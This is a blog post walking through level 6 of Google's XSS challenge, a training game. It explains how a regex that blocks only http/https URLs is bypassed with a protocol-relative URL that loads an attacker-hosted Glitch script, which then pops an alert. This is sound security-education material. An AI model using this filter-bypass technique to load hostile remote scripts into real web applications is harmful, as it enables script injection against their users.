Souvik Kar Mahapatra

Posted on Feb 11, 2021 • Updated on Feb 14, 2021 • Originally published at souvikinator.netlify.app

Google XSS challenge: Level 6 aka Follow the 🐇 (detailed walkthrough)

#security #xss #cybersecurity

Prerequisite

Before getting started one should be familiar with XSS or at least have an idea about it. Here is a good article which you may give a read to understand what is XSS. Read!

Also, I assume that readers are at least familiar with JavaScript. If not then I'll suggest to spend some time with JS and get comfortable with the basics. You can refer to javascript.info and MDN which are extremely helpful.

💡 Also in this whole series we'll not even roll our eyes on Hints and Toggle Code as in real-world bug hunting no one will give you hints or non-obfuscated source code so you have to figure out things yourself.

Mission Description

Complex web applications sometimes have the capability to dynamically load JavaScript libraries based on the value of their URL parameters or part of location.hash.

This is very tricky to get right -- allowing user input to influence the URL when loading scripts or other potentially dangerous types of data such as XMLHttpRequest often leads to serious vulnerabilities.

Mission Objective

Find a way to make the application request an external file that will cause it to execute an alert().

Breaking In

It's the showdown!

Starting with a similar approach we used in other levels, first, we'll understand what the application does. Notice in the URL level6/frame#/static/gadget.js after # there is a path to a file. Look's like it loads a JavaScript file gadget.js in /static/.

Having a look at the Network tab in-browser dev tool and we see gadget.js, there is nothing special about it but moving to the initiator tab tells us which part of the application initiated this request.

which leads us to the following

There are 3 parts. Line 48 calls includeGadget and line 17 is where we get the meat of this function.
Notice something? Yep! line 21 uses a regular expression to prevent us from loading external URLs. If you are familiar with regular expressions then you can easily figure out this specific regular expression prevents us from loading only those URLs starting with HTTP/HTTPS.

Also, line 18 creates a script element, line 28 it sets the source of the script element to the path to the JS file after # in the URL and finally, line 40 appends the script in the head tag of the application.

I'll try to load an external URL like so level6/frame#/static/gadget.js and run a debugger to show what happens at line 21.

in the image above you can see url=https://google.com and at line 21 it matches with the regular expression which is why it enters the if statement and prevents further execution of the script.

We found the weakness of the application and the Mission Objective already gave us a hint of what to do. We need to create an external JS file and host it somewhere and use that URL after # in the original URL.

Since we cannot use HTTP/HTTPS with the URL, so we need to understand how the URL behaves.
I couldn't find any specific service which hosts JS file over HTTPS, so I headed over to Glitch.com (online code playground + awesome features). Select Hello-webpage project and in that, I added alert(/xss level-6 baby/) and saved it. Perks of using Glitch.com is that it even hosts your project over HTTPS.

save the post and to get the URL of the hosted project click on the share button on the top left corner and copy the live site URL. To access the JS file of your project just change the URL from https://enormous-massive-citron.glitch.me to https://enormous-massive-citron.glitch.me/script.js.

now time to load this script in the application but remember we can't use HTTP/HTTPS so we omit that, our payload becomes:

Payload: //enormous-massive-citron.glitch.me/script.js

This is what the URL will look like: level6/frame#//enormous-massive-citron.glitch.me/script.js

On omitting the protocol(HTTP/HTTPS) in the URL it will inherit the protocol from the current environment or the current page i.e HTTPS which is why you have to make sure that your JS file is hosted over HTTPS otherwise browser will refuse to load.

and Boom! we popped an alert!!

We are done with the Google XSS Challenge and we popped a lot of alerts!